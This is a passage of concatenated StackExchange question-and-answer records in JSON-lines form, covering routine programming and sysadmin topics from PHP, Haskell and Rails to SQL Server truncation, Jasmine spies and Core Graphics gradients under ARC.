This is because you can use variable property names in PHP, e.g.\n<code>$foo = 'db';\necho $this->$foo; \/\/ equivalent to `echo $this->db;`\n<\/code>\nIn your case, <code>$db<\/code> was an undefined variable that got initialised to an empty string (although a PHP notice would have been triggered - do you have error reporting on?), so you were effectively trying to access a property of the same name, hence the error <code>Cannot access empty property<\/code>.\n","meta":{"source":"stackoverflow","title":"variable accesible in php class built in the construtor that references another class?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Battery Power Icon won't display on top bar\n\nQuestion: I have a surface book 2, and recently updated my OS from windows to ubuntu 20.04.1 LTS.\nI'm running into a problem when trying to update the top bar of the UI to show the battery percentage status.\nI've ran this command to enable the battery icon, but no luck\n<code>gsettings set org.gnome.desktop.interface show-battery-percentage true\n<\/code>\nI've also downloaded the \"Tweaks\" application, and toggled the battery percentage switch to ON. However, nothing.\nI've rebooted my system, but nothing as well.\nChecking the power stats shows that the battery is not been recognized.\n\nThank you in advance for debugging this.\nBest,\nAlvaro\nAnswer: Welcome to AskUbuntu, Alvaro.\nTo get this working on your SurfaceBook 2, you'll need to install some ACPI drivers so that the battery (and other devices) can be accessed. Here's how to do it:\n\nOpen a terminal (<code>[Ctrl]<\/code>+<code>[Alt]<\/code>+<code>[T]<\/code>)\nInstall the necessary tools to work with the source code you're going to need:<code>sudo apt install build-essential dkms git<\/code>\nMove to a \"safe\" working directory, for example:<code>cd ~\/Downloads<\/code>\nClone the ACPI drivers from GitHub to your machine:<code>git clone https:\/\/github.com\/qzed\/linux-surfacegen5-acpi<\/code>\nGo to the <code>module<\/code> directory:<code>cd linux-surfacegen5-acpi\/module\/<\/code>\nCompile the module:<code>make<\/code>\nInstall the module:<code>sudo insmod surfacegen5_acpi.ko<\/code><code>sudo make dkms-install<\/code>\n\nThe battery indicator should appear 5~10 seconds after installing the module.\n","meta":{"source":"askubuntu","title":"Battery Power Icon won't display on top bar","dup_signals":{}},"subset":"stackexchange"} +{"text":"php function imap_open failing when run through command line on windows with script\n\nQuestion: I am running Windows Server 2012, and is also running apache and PHP on an intranet.\nWhen I pull the script through http:\/\/localhost\/script.php it runs without issue and no problems.\nWhen I run the same script through the command line with the prompt:\nC:\\wamp\\bin\\php\\php5.3.3\\php.exe C:\\wamp\\www\\script.php\nit dies at the line when it gets to imap_open.\nHere is the full code:\n<code>$hostname = '{email-host:995\/pop3\/ssl\/novalidate-cert}INBOX';\n$username = 'user';\n$password = 'password';\n\n$inbox = imap_open($hostname,$username,$password) or die('Cannot connect: ' . imap_last_error());\n<\/code>\nAny ideas on why it will not work through command prompt.\nin php.ini, I have included:\n<code>extension=php_imap.dll\n\nextension=php_openssl.dll\n<\/code>\nComment: the php.ini for the command line is different then the one for apache, usually its cli.ini, so likely you don't have the extension enabled in that one... 
What error do you get when it `dies`, that would be helpful.\nComment: Thanks for the advice. There are two php.ini files, in for wamp, you have to go to the folder: C:\\wamp\\bin\\php\\php5.3.3 and edit the php.ini in that folder and that controls the settings for the command prompt.\nAnswer: Enable the extension in the <code>cli.ini<\/code> or <code>php-cli.ini<\/code> file. Which is a separate config then the one Apache uses.\nThat's my guess at least... Without knowing what error you get when it dies.\n","meta":{"source":"stackoverflow","title":"php function imap_open failing when run through command line on windows with script","dup_signals":{}},"subset":"stackexchange"} +{"text":"Complex integral with branch cuts\n\nQuestion: I am struggling with a complex double integral with multiple branch cuts. Even the single variable complex integral I find quite complicated due to the branch cut and the special functions involved in. Here is the simplified version of what I am after.\n<code>F[z_] := D[- Log[EllipticTheta[1, Pi z, E^(- Pi * t)]], {z, 2}]\nIntegrate[F[z]^{-u}, {z, 0, 1}] \n<\/code>\nWhere $t,u \\in \\mathbb R$ and $t,u > 0$.\nIt will be great to have an analytic answer (even for particular values of $u$, say integers to avoid some cuts). But I would be even happy with a numerical integration. I think the main obstruction that I am facing here is how to deal with the cuts in Mathematica.\nComment: F depends on z and t. Therefore, the Integral depends on t. Therefore, you can not do a numerical integration. And it is quit possible that no analytical solution exists.\nComment: I think you should first confirm `EllipticTheta` is not negative or zero in the range you're integrating. It doesn't look like it is. If so then you're not breaching any branch points or branch cuts of `Log` when $u$ is an integer. When it's rational, then in general would need to deal with branch point and cuts of root objects but again since not integrating over the orgin would not encounter the Mathematica default branch cut along the negative real axis for root objects as well.\nAnswer: Don't see any problem with its numerical integration. For example,\n<code>t = Pi; F[z_] := D[-Log[EllipticTheta[1, Pi z, E^(-Pi*t)]], {z, 2}]\nTable[NIntegrate[F[z]^-u, {z, 0, 1}], {u, 1, 4,1\/2}]\n<\/code>\n\n<code>{0.0506606, 0.013688, 0.00384974, 0.00110951, 0.00032505, 0.0000963569, 0.0000288177}<\/code>\nComment: `t = Pi; u = E; \nF[z_] := D[-Log[EllipticTheta[1, Pi z, E^(-Pi*t)]], {z, 2}]\nNIntegrate[F[z]^-u, {z, 0, 1}]` results in `0.00064808`.\nAnswer: The elliptic Thetas near the real line are deformations of $sin, cos$ functions with periods of multiples of $\\pi$ and exponential growth in imaginary directions\n<code> Manipulate[ComplexPlot3D[EllipticTheta[1, z, q], \n{z, -Pi (1 + I\/5), Pi (1 + I\/5)}, PlotRange -> All,\nTicks -> {Pi Range[-1, 1], Automatic, Automatic}], \n{{q, 0.8}, 0.01,1}, ControlPlacement -> Top]\n<\/code>\n\nThe logarithm has of course logarithmic branch cuts along the real line of negative half periods with infintely many copies of $\\mathbb C$ with $2\\pi i $ distance in the argument. 
Integrals along the real line make sense only in the intervals of positivity of $sin z$\n\nStructurally, the derivative of $ (Log Sin)'' = Csc^2$ is showing the second derivatives have the form of quadratic rationals of elliptic Thetas, that can be further analyzed via their Fourier series.\nComment: Doesn't `Manipulate[\n ComplexPlot[\n EllipticTheta[1, z, q]^(-1\/2), {z, -Pi (1 + I\/5), Pi (1 + I\/5)}, \n PlotRange -> All, \n Ticks -> {Pi Range[-1, 1], Automatic, Automatic}], {{q, 0.8}, 0.01, \n 1}, ControlPlacement -> Top]` show branch cuts or am I mistaken?\nComment: The theta functions are eintier functions in z. This fact is clear for fast converging Fourier series with coefficients converging to zero faster than any power, which is just a bit slower than a finite fourier sum. They are periodic in the real direction and quasiperiodic in imaginary direction. Their quotients are the meromorphic Jacobi elliptic functions.\n","meta":{"source":"mathematica.stackexchange","title":"Complex integral with branch cuts","dup_signals":{}},"subset":"stackexchange"} +{"text":"IIS7 and clientCaching with ASP.Net MVC\n\nQuestion: Is it possible to declaratively set <code>clientCache<\/code> for an Action using the web.config in IIS7?\nWe need to set an expiry value of 1 day for our <code>Home\/Index<\/code> action. As of now we are doing this using a filter attribute. Is it possible to accomplish the same declaratively?\nWe are able to do it for static content, but not for action methods through the <code>location<\/code> and <code>system.webServer<\/code> sections in the web.config.\n<code><location path=\"Content\">\n <system.web>\n <authorization>\n <allow users=\"*\"\/>\n <\/authorization>\n <\/system.web>\n <system.webServer>\n <staticContent>\n <clientCache httpExpires=\"Sat, 28 Nov 2009 09:00:00 GMT\" cacheControlMode=\"UseExpires\" \/>\n <\/staticContent>\n <\/system.webServer>\n<\/location>\n<\/code>\nAnswer: I don't think it would be possible to do so in web.config - we create a base controller and put it in there. That way we don't have to decorate all of our actions with attributes.\n","meta":{"source":"stackoverflow","title":"IIS7 and clientCaching with ASP.Net MVC","dup_signals":{}},"subset":"stackexchange"} +{"text":"what is main\/major difference between interface and abstract class in oop\n\nQuestion: I face this question in many interviews but here i exactly want to know the big difference between interface and abstract class in object oriented programming.\nAnyone there?\nComment: Possible duplicate of [Interface vs Abstract Class (general OO)](https:\/\/stackoverflow.com\/questions\/761194\/interface-vs-abstract-class-general-oo)\nAnswer: Interface:\n1.Interface is not class\n2.Interface use for \u2013 Data Abstraction, Future implementation.\n3. Interface contains only the abstract members.\n4.Interface contains the declaration, the class which will implement it will have to define\/add the logic on it.\nAbstract Class\n1.Abstract class is a class\n2.Abstract class is use for a base class.\n3. 
Abstract class contains both Abstract + normal members\n4.The abstract members have only the declaration (like Interface),but the normal members are getting define.\nAnswer: One major difference of interface and abstract class is:\nif interface contains 9 methods and we implements that interface then we need to override all 9 methods in our class.\nif we take one abstract class and we extends that abstract class no need to override all 9 methods override only that method that wee need.\nAnswer: The main difference is that in interface we can only define the methods and variable and give body\/values where it is implemented by overriding.\nWhere abstract class has the property of a normal class and an interface. We can just make the variables and methods abstract like interface and we can also add variables and methods with body\/value in the same class.\n","meta":{"source":"stackoverflow","title":"what is main\/major difference between interface and abstract class in oop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove objects, and child objects from a list in C# where they match an object property in another list\n\nQuestion: I need a C# LINQ query where I remove objects in a list based on whether they match a property in another list. In addition, those objects can contain children of the same type and I need to remove them as well if there is not a match.\nIn my example, I also want to remove the children of children. The match doesn't need to be hierarchical - just a basic match. Here are my classes and my failed attempt. Any help would be awesome!\n<code>public class GsdMegaMenu\n {\n public int Id { get; set; } \n public int PortalId { get; set; } \n public int TabId { get; set; } \n }\n\npublic class MenuItem\n {\n public int Id { get; set; } \n public int PortalId { get; set; } \n public int TabId { get; set; }\n public List<MenuItem> Children { get; set; }\n\n }\n\nList<GsdMegaMenu> megaMenuItems = GsdMegaMenu.GetAllGsdMegaMenus();\nRootNode.Children.RemoveAll(x => !megaMenuItems.Any(y => y.TabId == x.TabId));\n<\/code>\nComment: Thanks - you are correct, I updated the codebase. Any idea on the error I get when implementing @Cyral code snippet?\nComment: Your code looks like you are only removing immediate children. Not children of children. Is that right?\nComment: @zespri - yes, I am trying to remove the children, and the children of children, that do not match the TabId property of the comparable List. The code below looks like it should work but I get an error about converting the list to a system predicate. I don't know what that means...\nComment: So, what's wrong with the code in your question (not in that answer)? Are you gettting a error?\nComment: My code works, it just doesn't take in to account the children of the children - just the direct children.\nAnswer: If you need to also process children of children you would have to explicitly loop though them. RemoveAll is not a linq method it's a method on the <code>List<\/code> class. You will need to call it on every children list.\n<code>RootNode.Children.RemoveAll(x => megaMenuItems.All(y => y.TabId != x.TabId));\nforeach (MenuItem node in RootNode.Children)\n{\n if (node.Children != null)\n {\n node.Children.RemoveAll(x => megaMenuItems.All(y => y.TabId != x.TabId));\n }\n }\n<\/code>\nUpdate\nIf you are after purely LINQ solution it has to be read-only, that is it can't manipulate existing lists, it can create new ones. I would not recommend it in your case though. 
In your case the loop above seems more fitting.\n<code>RootNode = RootNode.Children.Where(x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId))\n .Select(z => new MenuItem\n {\n Id = z.Id, PortalId = z.PortalId, TabId = z.TabId, \n Children = z.Children == null ? null \n : z.Children.Where(x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId)).ToList() \n })\n .ToList();\n<\/code>\nFor efficiency (not that it would matter in your case), you could also rewrite it as this:\n<code>Func<MenuItem, bool> predicate = x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId);\nRootNode = RootNode.Children.Where(predicate)\n .Select(z => new MenuItem\n {\n Id = z.Id, PortalId = z.PortalId, TabId = z.TabId, \n Children = z.Children == null ? null\n : z.Children.Where(predicate).ToList()\n })\n .ToList();\n<\/code>\nComment: Nest another loop in then =)\nComment: This is fantastic - perfect! One more thing... What if I wanted to take it one more level down to remove the nodes if the children of the children had a match. Again - thank you!\n","meta":{"source":"stackoverflow","title":"Remove objects, and child objects from a list in C# where they match an object property in another list","dup_signals":{}},"subset":"stackexchange"} +{"text":"Jasmine 4 ANgular 13 CryptoBrowserify publicEncrypt Error spyOn> : publicEncrypt is not declared writable or has no setter\n\nQuestion: publicEncrypt is not declared writable or has no setter\n<code> beforeEach(fakeAsync(() => {\n spyOn(CryptoBrowserify, 'publicEncrypt').and.returnValue(Buffer.from('ENCRYPT', 'utf8'));\n \n }));\n\nError: <spyOn> : publicEncrypt is not declared writable or has no setter\n Usage: spyOn(<object>, <methodName>)\n Error: <spyOn> : publicEncrypt is not declared writable or has no setter\n Usage: spyOn(<object>, <methodName>)\n<\/code>\nComment: It seems like you want to `spyOn` an imported library function. It is not possible to do that anymore with the changes\/updates to TypeScript. I have found this to be the best method in spying on imported libraries: https:\/\/stackoverflow.com\/questions\/60259259\/error-supportsscrollbehavior-is-not-declared-configurable\/62935131#62935131. Read the Github thread as well.\nComment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.\nComment: @AliF50 Thank you, working fine with Wrapper class, did you get a chance to write test case for wrapper class? we need to cover 100%,\nexport class CryptoBrowserifyWrapper {\n public static publicEncrypt(...args) {\n return publicEncryptLocal(...args);\n }\n}\nComment: I am not sure how to test the wrapper class, I personally did not test it. 
Show your boss this tweet: https:\/\/twitter.com\/BenLesh\/status\/912487170371284994 ;).\nAnswer: So this is telling you that the property is not <code>writable<\/code>.\nYou can work around this by overriding the property descriptor for the duration of your test\nNote that you can only do this if the property is <code>configurable<\/code>.\nI have found that in Angular if you do the below prop descriptors come as non-configurable so you will not be able to apply the solution\n<code>\/\/ this will cause prop descriptors to come as non-configurable\nimport from 'zone.js'\n<\/code>\nSo in your <code>test.ts<\/code> do this instead\n<code>\/\/ this will cause prop descriptors to come as configurable\nimport from 'zone.js\/dist\/zone'\nimport from 'zone.js\/dist\/zone-testing'\n<\/code>\n<code>import * as someNsObj from 'external\/lib';\n\n\/\/ get the current descriptor\nconst originalDesc = Object.getOwnPropertyDescriptor(someNsObj, 'targetFunction');\n\n\/\/ replace with a writable prop\nbeforeAll(() => {\n Object.defineProperty(someNsObj, 'targetFunction', {\n enumerable: true,\n configurable: true,\n writable: true, \/\/ this is what makes the difference\n value: () => {}, \/\/ or whatever makes sense\n });\n});\n\n\/\/ restore the original descriptor\nafterAll(() => {\n Object.defineProperty(someNsObj, 'targetFunction', originalDesc);\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Jasmine 4 ANgular 13 CryptoBrowserify publicEncrypt Error spyOn> : publicEncrypt is not declared writable or has no setter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it OK return http status 404 in the POST?\n\nQuestion: I'm developing an API and I always try to use the most correct http status codes for each scenario.\nOne of this scenarios is the response for POST requests. Per example, a POST method for an endpoint <code>\/orders\/<\/code> receive some informations, like a <code>customer<\/code>:\n<code>{\n customerDocument: {number: \"123.456.789\"},\n \/\/ other informations for create a order\n}\n<\/code>\nSo, my questions is: if this <code>number<\/code> from <code>customerDocument<\/code> not exists, is it Ok to return a 404 status code error with a nice message telling that the customer was not found?\nI normally use 404 only for GET in the specific resources (the most obvious usage), like:\n<code>\/customers\/{number}\/\n<\/code>\nIn business validations like \"The customer is not active\", I normally use the http status code 422 for any http method (POST, PUT, GET, etc). I'm in doubt if I can use 404 or 422 for my POST example.\nComment: I tend to follow this table http:\/\/www.restapitutorial.com\/lessons\/httpmethods.html\nAnswer: I think <code>400<\/code> is the appropriate status code in this scenario, given its definition from Wikipedia:\n\n400 Bad Request\nThe server cannot or will not process the request due to an apparent client error.\n\nAccording to the description, semantically, <code>422<\/code> is better (\"The request was well-formed but was unable to be followed due to semantic errors.\"). However, <code>422<\/code> is introduced for WebDAV, so it is better to use general purpose status code such as <code>400<\/code>.\n<code>400<\/code> is not the perfect status code, as whether document number exists or valid is not so apparent. 
However, excludes special-purpose status code such as <code>422<\/code>, <code>400<\/code> is the best option.\nWhy <code>404<\/code> is not appropriate?\nFrom RESTful API point of view, endpoint <code>\/orders\/<\/code> is a resource, no matter it accepts <code>GET<\/code> or <code>POST<\/code> or something else. <code>404<\/code> is only appropriate when the resource <code>\/orders\/<\/code> itself does not exist. If <code>\/orders\/<\/code> endpoint exist, but its invocation failed (no matter what reasons), the response status code must be something other than <code>404<\/code>.\nComment: Hi, your comment on 404 in inaccurate. if the endpoint \/orders does not exist that is 404, that part is right, but if the order 123 does not exist and user calls \/orders\/123, that is also a 404. @Dherik should be returning 404 as the response for the scenario he is asking about\nComment: 412 Precondition Failed is not appropriate unless the client has defined the precondition in the headers. You should remove that part of your answer.\nComment: @VoiceOfUnreason Thanks for your suggestion, introducing `412` do make things complicated and confusing. I'll remove it from my answer.\nComment: @shaochuancs about the 404, I agree! But the 400 not appear the best option. Normally, the people understand 400 as a syntax or type error in the request. As described in the Wikipedia link: \"e.g., malformed request syntax, size too large, invalid request message framing, or deceptive request routing\". In RestEasy framework, 400 is used for this cases, for example.\nComment: @Dherik yes, 400 is not perfect. But after check all response code, I can't find a code better than it.\n","meta":{"source":"stackoverflow","title":"Is it OK return http status 404 in the POST?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do I need to include my scaled outputs in my back-propagation equation (SGD)?\n\nQuestion: Quick question, when I am backpropagating the loss function to my parameters and I used a scaled output (ex. tanh(x) * 2), do I need to include the derivative of the scaled output w.r.t the original output? Thank you!\nComment: Is loss calculated before or after scaling?\nAnswer: Before we can backprop the errors, we've to compute the gradient of the loss function with respect to each of the parameters. This computation involves computing the gradients of the outputs first and then use chain rule repeatedly. So, when you do this, the scaling constant remains as is. So, yes, you've to scale the errors accordingly.\nAs an example, you might have observed the following L2 regularized loss - a.k.a Ridge regression:\nLoss = 1\/2 * |T - Y|^2 + \\lambda * ||w||^2\nHere, we are scaling down the squared error. So, when we compute the gradient 1\/2 & 2 would cancel out. If we would not have multiplied this by 0.5 in the first place, then we would have to scale up our gradient by 2. 
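To make the tanh example from the question concrete, here is a small finite-difference check (plain NumPy; the squared-error loss and the input value are arbitrary choices for illustration) showing that the gradient through y = 2*tanh(x) has to carry the factor of 2:\n<code>import numpy as np\n\nx = 0.3\ny = 2.0 * np.tanh(x)             # scaled output\ntarget = 1.0\nloss = 0.5 * (y - target) ** 2   # arbitrary squared-error loss\n\n# chain rule: dL\/dx = dL\/dy * dy\/dx, with dy\/dx = 2 * (1 - tanh(x)**2)\ndL_dy = y - target\ndL_dx = dL_dy * 2.0 * (1.0 - np.tanh(x) ** 2)\n\n# numerical check\neps = 1e-6\ny_eps = 2.0 * np.tanh(x + eps)\nloss_eps = 0.5 * (y_eps - target) ** 2\nprint(dL_dx, (loss_eps - loss) \/ eps)   # the two values agree only if the factor 2 is kept\n<\/code>\nDropping the 2 from dL_dx makes the analytic value half of the numerical one.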
Else the gradient vector would point in some other direction instead of the direction which minimizes the loss.\n","meta":{"source":"stackoverflow","title":"Do I need to include my scaled outputs in my back-propagation equation (SGD)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails partial not rendered when called via JavaScript function\n\nQuestion: I am trying to render a partial upon change in the drop down list.\nThere is the onchange javascript function which directs to a link to display the corresponding form.\nBut here I am getting a <code>#<ActionController::UnknownFormat: ActionController::UnknownFormat><\/code> error inside the get_template method in controller.\nI suppose it is something to do with calling the link through javascript, as the request is processed as HTML. \n<code>Processing by XYZController#get_template as HTML\n<\/code>\nHow to process it as JS ? \nHere's the detailed code. \ndropdown.html.erb \n<code><div id=\"requests_dropdown\">\nChoose the type of request : <%= select_tag 'drop_request_id', options_for_select(@request_types.map{|x| [x[:name], x[:id]] } ) %>\n<\/div>\n<\/code>\nJavascript\n<code><script>\n\n$('#drop_request_id').on('change', function() { \n var request_type_id = $('#drop_request_id').val();\n var href = 'get_template\/' + request_type_id ;\n window.location = href;\n});\n<\/script>\n<\/code>\ncontroller\n<code> def get_template\n\n @request_type = [x,y,z] \n respond_to do |format|\n format.js\n end\nend\n<\/code>\nget_template.js.erb\n<code>$(\"#request_form_partial\").html(\"<%= escape_javascript(render partial: 'request_form', locals: { request_type: @request_type } ) %>\"); \n<\/code>\nComment: Out of curiosity, why are you using `window.location = href` instead of an AJAX `get` call?\nAnswer: You need to call your method via ajax.\nYou are getting error because you are trying to GET the html format,whereas your method renders the js format response.\nPlease edit your code to following:\n<code> <script> $('#drop_request_id').on('change', function() { \nvar request_type_id = $('#drop_request_id').val(); \nvar href = 'get_template.js\/' + request_type_id ; \n$.get(href);\n}); \n<\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Rails partial not rendered when called via JavaScript function","dup_signals":{}},"subset":"stackexchange"} +{"text":"I do not understand this error haskell\n\nQuestion: My code receives a list of values \u200b\u200bin hexadecimal and i have to pass them to binary and put each result in a list but I have these two errors and i dont know how to fix them\n<code>Pixels.hs:121:29:\n Occurs check: cannot construct the infinite type:\n t0 = Bool -> [a1] -> t0\n In the return type of a call of `modA'\n Probable cause: `modA' is applied to too many arguments\n In the expression:\n modA (o ++ [(k `mod` 2)]) (l + 1) (k `div` 2) otherwise o\n In an equation for `modA':\n modA o l k\n | l < 8 = modA (o ++ [(k `mod` 2)]) (l + 1) (k `div` 2) otherwise o\n\nPixels.hs:126:89:\n Couldn't match expected type `[a0]'\n with actual type `Bool -> t1 -> [[a1]] -> [a0] -> t0'\n In the first argument of `(++)', namely `f'\n In the fourth argument of `f', namely\n `(f\n ++\n [(psr (head (e1)))\n ++\n (psr (head (e2)))\n ++ (psr (head (e3))) ++ (psr (head (e4))) ++ (psr (head (e5)))])'\n In the expression:\n f otherwise\n convertir\n [tail (e1), tail (e2), tail (e3), tail (e4), ....]\n (f\n ++\n [(psr (head (e1)))\n ++\n (psr (head (e2)))\n ++ (psr (head (e3))) ++ (psr (head (e4))) ++ (psr (head (e5)))])\nFailed, 
modules loaded: none.\n<\/code>\nhere is the code\n<code>rInt :: String -> Int\nrInt = read\n\nfont:: Char -> Pixels\nfont a = let x= ord a in\n if x>=0 || x<=31 || x>=126 then [\"*****\",\"*****\",\"*****\",\"*****\",\"*****\",\"*****\",\"*****\"]\n else\n auxfont (fontBitmap!!(x-32))\n where\n auxfont b = let y = map trns (map rInt (map show b)) in\n convertir y []\n\n trns z = modA [] 1 z\n modA o l k\n | l < 8 = modA (o++[(k `mod` 2)]) (l+1) (k `div` 2) \n otherwise o \n\n convertir (e1:e2:e3:e4:e5) f \n | null e1 = f\n otherwise convertir [tail(e1),tail(e2),tail(e3),tail(e4),tail(e5)] (f++[(psr(head(e1)))++(psr(head(e2)))++(psr(head(e3)))++(psr(head(e4)))++(psr(head(e5)))])\n psr 0 = \" \"\n psr 1 = \"*\"\n<\/code>\nComment: Have you tried specifying the type signature of modA. This can often result in a more understandable error message.\nComment: Can you give the minimum compilable example, pixals and ord are missing\nAnswer: Your syntax is wrong, you need a <code>|<\/code> before <code>otherwise<\/code>:\n<code>foo x y z | x > y = ...\n | otherwise = ...\n<\/code>\n","meta":{"source":"stackoverflow","title":"I do not understand this error haskell","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cannot truncate table because it is being referenced by a FOREIGN KEY constraint\n\nQuestion: I get the following message even when the table that references it is empty: \"Cannot truncate table 'dbo.Link' because it is being referenced by a FOREIGN KEY constraint\" Doesn't seem to make much sense why this is occurring. Any suggestions?\nAnswer: In SQL Server a table referenced by a FK cannot currently be truncated even if all referencing tables are empty or the foreign keys are disabled.\nYou need to use <code>DELETE<\/code> (may require much more logging) or drop the relationship(s) prior to using <code>TRUNCATE<\/code> and recreate them afterwards or see the workarounds on this connect item for a way of achieving this using <code>ALTER TABLE ... SWITCH<\/code>\nComment: thats sounds like quite a poor feature of the product. but i guess will need to factor that into code. thanks\nAnswer: You cannot truncate a table which has an FK constraint on it. As workaround, you could:\n1\/ Drop the constraints\n2\/ Trunc the table\n3\/ Recreate the constraints.\nHere it is the associated T-SQL script, supposing you have 2 tables called MyTable and MyReferencedTable:\n<code>-- Remove constraint\nIF EXISTS(SELECT 1 FROM sys.foreign_keys WHERE name = 'FK_MyReferencedTable_MyTable')\nBEGIN\n ALTER TABLE dbo.MyReferencedTable\n DROP CONSTRAINT FK_MyReferencedTable_MyTable\nEND\n\n-- Truncate table\nTRUNCATE TABLE dbo.MyTable\n\n-- Re-Add constraint\nIF NOT EXISTS(SELECT 1 FROM sys.foreign_keys WHERE name = 'FK_MyReferencedTable_MyTable')\nBEGIN\n ALTER TABLE dbo.MyReferencedTable\n WITH CHECK ADD CONSTRAINT [FK_MyReferencedTable_MyTable] FOREIGN KEY(ListingKey)\n REFERENCES dbo.MyTable (ListingKey)\nEND\n<\/code>\nAnswer: Execute the following query to search any constraint:\n<code>use MyDatabase\nselect c.name as c_name, t.name as t_name\nfrom sys.key_constraints c\njoin sys.tables t on t.object_id = c.parent_object_id\n<\/code>\nIf any constraint found on your table, remove it.\nAnswer: If you are receiving this error and you need to truncate the table then alternative solution could be that you can drop and re-create the table along with <code>primary\/other_keys\/indexes\/triggers<\/code>. 
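A bare-bones T-SQL sketch of that route for the dbo.Link table from the question (the column definitions here are placeholders; script the real table, keys, indexes and triggers out of SSMS before dropping anything):\n<code>-- drop any foreign keys that reference dbo.Link first (see the script above), then:\nDROP TABLE dbo.Link;\n\n-- re-create the table from the scripted definition (placeholder columns shown)\nCREATE TABLE dbo.Link\n(\n    LinkKey INT NOT NULL CONSTRAINT PK_Link PRIMARY KEY,\n    Url NVARCHAR(400) NOT NULL\n);\n\n-- then re-create the referencing foreign keys, other indexes and triggers\n<\/code>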
Please make sure that you don't need to the data in that table.\nThis soulution is working like a charm for me and hardly took a minute to finish. I am doing it for masking purpose.\nAnswer: Not for SQL Server but MySQL only.\nInstead of deleting or recreating the constraint, I prefer this simpler way.\nDisable the constraint validation by executing the following query first :\n<code>SET FOREIGN_KEY_CHECKS=0;\n<\/code>\nThen truncate your tables\nAnd finally, reactivate the constraint validation :\n<code>SET FOREIGN_KEY_CHECKS=1;\n<\/code>\nThats a common solution when you migrate databases, so you don't have to worry about the order the tables are inserted in.\nComment: This is for MySQL and not SqlServer.\nComment: This is not a valid SQL Server setting.\n","meta":{"source":"stackoverflow","title":"Cannot truncate table because it is being referenced by a FOREIGN KEY constraint","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issue with CFArrayRef and NSArray when drawing gradient using ARC\n\nQuestion: I have an ARC project and am trying to draw a vertical linear gradient. The code below works on the simulator, but throws a memory \/<code>EXC_BAD_ACCESS<\/code> error when testing on the device. The app crashes on with the following two lines of code:\n<code>NSArray *colorArray = [NSArray arrayWithObjects:(__bridge id)topColor, (__bridge id)bottomColor, nil];\nCGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef) colorArray, colorLocations); \n<\/code>\nThose two lines of code are taken from the following code (provided for reference):\n<code>- (void)drawRect:(CGRect)rect\n{\n CGContextRef context = UIGraphicsGetCurrentContext();\n\n [self createGradientForContext:context andView:self.captionView];\n [self createGradientForContext:context andView:self.linksView];\n [self createGradientForContext:context andView:self.commentView]; \n\n}\n\n- (void)createGradientForContext:(CGContextRef)context andView:(UIView *)view\n{\n\n CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();\n\n CGFloat colorLocations[] = { 0.0f, 1.0f };\n\n CGColorRef topColor = [[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor];\n CGColorRef bottomColor = [[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor];\n NSArray *colorArray = [NSArray arrayWithObjects:(__bridge id)topColor, (__bridge id)bottomColor, nil];\n CGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge_retained CFArrayRef) colorArray, colorLocations); \n\n CGRect frame = view.frame;\n CGPoint startPoint = CGPointMake(CGRectGetMidX(frame), CGRectGetMinY(frame));\n CGPoint endPoint = CGPointMake(CGRectGetMidX(frame), CGRectGetMaxY(frame));\n\n CGContextSaveGState(context);\n CGContextAddRect(context, frame);\n CGContextClip(context);\n CGContextDrawLinearGradient(context, gradient, startPoint, endPoint, 0);\n CGContextRestoreGState(context);\n\n CGGradientRelease(gradient);\n CGColorSpaceRelease(colorSpace);\n\n}\n<\/code>\nThanks ahead of time for any and all guidance.\nComment: I would recommend using ARC, there really needs to be a compelling reason not to.\nComment: Don't you love arc? Taking away programmer control of memory... I thought Apple learned their lesson with garbage collection. I would recommend not using it...\nComment: Why are you using an object there when everything else is a `CFType`? 
Just use `CFArray` and you don't have to worry about bridging.\nAnswer: Now to explain why you were crashing\u2026\nThe problem is these two lines:\n\n<code>CGColorRef topColor = [[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor];\nCGColorRef bottomColor = [[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor];\n<\/code>\n\nThis is a very common problem; there are many questions on Stack Overflow by users who've gotten bitten by this.\nThe problem is that because those UIColor objects are never referenced after those lines, ARC releases them immediately\u2014and because those UIColor objects are the sole owners of the CGColor objects, the UIColors release the CGColors immediately, leaving you with two dead CGColor objects. Which you then try to put into an array.\nAs you found, switching from NSArray to pure CFArray will not fix this. Switching from UIColor to pure CGColor is one solution; the other is to put your own ownership on the CGColors:\n<code>CGColorRef topColor = CGColorRetain([[UIColor colorWithRed:51.0f\/255.0f green:51.0f\/255.0f blue:51.0f\/255.0f alpha:1.0f] CGColor]);\nCGColorRef bottomColor = CGColorRetain([[UIColor colorWithRed:48.0f\/255.0f green:48.0f\/255.0f blue:48.0f\/255.0f alpha:1.0f] CGColor]);\n\n\u22ee\n\nCGColorRelease(topColor);\nCGColorRelease(bottomColor);\n<\/code>\nComment: +1 for correct technical answer. For me, a better solution is to use UIColor right up until the point you create the array:\n\n[NSArray arrayWithObjects:(__bridge id)startColour.CGColor, (__bridge id)endColour.CGColor, nil];\nComment: One more option is to `CGColorRetain(theColorRef)`, and `(__bridge_transfer id)theColorRef` when stuffing into the array. This will tell ARC that the object is already retained, but needs to be released by ARC at a later time.\nComment: @Cthutu: That does effectively the same as retaining them yourself\u2014in that case, the array retains them. For non-gradient purposes, passing `myUIColor.CGColor` directly to `CGContextSetFillColorWithColor` or similar (as opposed to stashing it in a `CGColorRef` variable and then retrieving it from there) should also work, if that function either retains the color object or does not attempt to keep it.\nComment: Yes it's exactly the same thing but you don't need all the CGColorRelease() 